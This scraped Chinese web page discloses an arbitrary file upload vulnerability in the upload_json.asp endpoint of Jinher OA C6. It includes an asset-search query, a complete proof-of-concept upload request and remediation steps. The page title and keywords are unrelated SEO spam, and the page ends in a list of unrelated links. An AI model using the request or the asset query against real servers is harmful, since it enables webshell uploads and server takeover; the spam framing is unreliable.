当前位置: 首页 > news >正文

网站后台用户名密码免费公司网址

网站后台用户名密码,免费公司网址,网站分类目录查询,网站提交链接入口产品介绍 金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。 漏洞概述 金和 OA C6 upload_json接口处存在任意文件上传漏洞#xff0c;攻击者可以通过构造特殊请求包上…产品介绍 金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。 漏洞概述 金和 OA C6 upload_json接口处存在任意文件上传漏洞攻击者可以通过构造特殊请求包上传恶意后门文件从而获取服务器权限。 资产测绘 app“Jinher-OA” 漏洞复现 POST /c6/KindEditor1/asp/upload_json.asp?dirfile HTTP/1.1 Host: your_ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Length: 369 Accept: */* Accept-Encoding: gzip, deflate, br Connection: close Content-Type: multipart/form-data; boundary---------------------------494407267900182071383631703039-----------------------------494407267900182071383631703039 Content-Disposition: form-data; namelocalUrl-----------------------------494407267900182071383631703039 Content-Disposition: form-data; nameimgFile; filenamevae.txt Content-Type: image/pngvae -----------------------------494407267900182071383631703039-- 访问打码的路径访问上传文件 成功上传借此可以上传任意文件。 修复建议 1、升级到安全版本 2、如非必要禁止公网访问该系统。 3、设置白名单访问。
http://www.zqtcl.cn/news/295060/

相关文章:

  • 服务器租用相关网站一个空间怎么放两个网站吗
  • 每个城市建设规划在哪个网站南宁seo怎么做优化团队
  • 做资讯类网站ccd设计公司官网
  • 写作网站5妙不写就删除抚州建设网站
  • 沙田网站建设公司网站风格设计原则
  • 安徽省建设监理网站黑群晖可以做网站吗
  • 手机百度seo快速排名搜索引擎优化目标
  • 长春 房地产网站建设网站建设 合同
  • 电商专业培训网站建设wordpress内置播放器
  • 创意网站设计模板点击器免费版
  • 做的不错的h5高端网站网站是怎么优化的
  • 淄博做网站优化佛山 做网站公司
  • 设计网站的步骤网站开发怎么学习
  • 提供网站技术国内外电子政务网站建设差距
  • 阜新建设网站物流网站建设的小结
  • 个人可以网站备案吗建设多用户网站
  • 平面设计素材库淄博网站优化价格
  • moodle网站建设论坛排名
  • 网站建设与推广方式起名网站建设
  • 厦门网站建设网站制作网站广告推广价格
  • 网站建设费用计入哪个科目深圳网站建设工资
  • 大岭山镇网站建设公司软文是什么文章
  • 网站正在建设张雪峰谈电子商务
  • 网站建设中标签导航的特征小型广告公司简介
  • 广西省建设厅网站jquery特效网站
  • 做推文的网站创意设计绘画作品
  • 做响应式网站的体会长沙域名注册公司
  • 网站备案照片 多少钱网站怎么做网页游戏
  • 金坛区建设局网站中搜网站提交
  • 建站之星如何建网站html静态网页作业成品